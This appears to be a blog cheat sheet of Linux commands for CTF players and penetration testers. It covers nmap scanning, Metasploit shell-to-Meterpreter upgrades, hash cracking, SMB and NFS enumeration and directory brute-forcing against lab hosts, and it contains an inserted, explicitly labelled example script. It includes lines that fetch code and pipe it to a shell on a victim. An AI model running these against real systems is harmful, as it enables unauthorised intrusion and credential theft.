Abhinav Kumar · Hacking 101 · 2 min read

Linux Commands for Hacking and Security

Linux commands and shortcuts often used by hackers, security professionals, and CTF players.

Linux commands that are often used by hackers, security professionals and CTF players. We will avoid any payloads or one-liner exploits (these will be covered on a different page sometime). Updated - October 02, 2023.

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


# TCP scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

# UDP scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store the ports found by the scan as a comma-separated list.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb
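
The port-list pipeline above, as an added example that is not part of the original page: it runs on a constructed sample of nmap output and adds a variant that keeps only ports whose state is `open`, because matching on `^[0-9]` also picks up `filtered` and `closed` lines. The function names, the host `target.example` and the address `192.0.2.10` are assumptions.

```shell
#!/bin/sh
# Added example: turn nmap's normal output into a port list for -p.

# Constructed sample output (not a real scan; host and address are placeholders).
sample_scan() {
cat <<'EOF'
Nmap scan report for target.example (192.0.2.10)
Host is up (0.031s latency).
PORT     STATE    SERVICE
22/tcp   open     ssh
53/tcp   open     domain
80/tcp   open     http
135/tcp  filtered msrpc
8080/tcp closed   http-proxy

Nmap done: 1 IP address (1 host up) scanned in 42.17 seconds
EOF
}

# The page's pipeline: every line that starts with a digit, whatever its state.
ports_all_states() {
  grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
}

# Stricter variant: keep a port only when the STATE column is exactly "open"
# (this also drops UDP results reported as "open|filtered").
ports_open_only() {
  awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
         split($1, p, "/"); printf "%s%s", sep, p[1]; sep = ","
       }'
}

# Build the -p argument, failing instead of emitting an empty "-p".
port_arg() {
  _list=$(ports_open_only)
  [ -n "$_list" ] || { echo "no open ports in scan output" >&2; return 1; }
  printf '%s%s\n' '-p' "$_list"
}

echo "all states: $(sample_scan | ports_all_states)"
echo "open only:  $(sample_scan | ports_open_only)"
echo "argument:   $(sample_scan | port_arg)"
```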


Start Metasploit with database

└─$ systemctl start postgresql

└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

Metasploit Shell Upgrade to Meterpreter

sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Extract Files

Gz Files

gunzip archive.gz

tar Files

tar -xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i  # include lines that match (-i ignores case)
grep -v  # exclude lines that match

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory

Mount NFS Share

Make a directory locally and mount the share on it.

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


Get version via banner

nc IP port


From GitHub

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

WordPress CMS Vulnerability Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u  http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet

Reading a File

head -20 filepathandname
tail filename
tail -20 filename
cat filename | grep "word_to_filter"

Replace in File

sed 's/wordtoreplace/wordtoreplacewith/g' /filepath > outputfilepath
